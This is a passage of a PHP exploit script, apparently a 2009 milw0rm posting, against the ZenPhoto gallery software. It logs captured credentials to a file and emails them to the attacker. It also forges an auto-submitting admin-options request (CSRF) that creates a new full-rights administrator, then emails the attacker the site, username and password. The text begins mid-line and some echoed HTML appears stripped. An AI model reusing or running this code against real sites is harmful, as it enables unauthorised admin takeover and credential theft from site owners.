$value) fwrite($file, "$key = $value\r\n"); fwrite($file,"\r\n"); fclose($file); @mail($email, "ZenPhoto Double Penetration Exploit got a password!", "Please check your log file :)"); redirect(); //send the back to the admin page } else // try to create a new admin using CRSF { $inputs = array( "saveadminoptions" => "true", "totaladmins" => "1", "alter_enabled" => "1", "0-adminuser" => $user, "0-confirmed" => "2", "0-adminpass" => $pass, "0-adminpass_2" => $pass, "0-admin_rights" => "1", "0-options_rights" => "1", "0-zenpage_rights" => "1", "0-tags_rights" => "1", "0-themes_rights" => "1", "0-all_album_rights" => "1", "0-edit_rights" => "1", "0-comment_rights" => "1", "0-upload_rights" => "1", "0-view_rights" => "1", "0-main_rights" => "1", "0-admin_name" => "Owned by dusecurity.com", "0-admin_email" => 'petros was here <3' ); $action = $site."/zp-core/admin-options.php?action=saveoptions"; echo ""; echo "

"; foreach($inputs as $key => $value) { echo ""; } echo ''; //not that they have a choice lol echo "

"; // notify them by e-mail because the admin will probably notice he cant login @mail($email,"ZenPhoto Double Penetration Exploit Success!", "Site: $site/zp-core/admin.php\nUsername: $user\nPassword: $pass"); } function redirect(){ header("Location: $site/zp-core/admin.php");exit; } ?> # milw0rm.com [2009-07-16]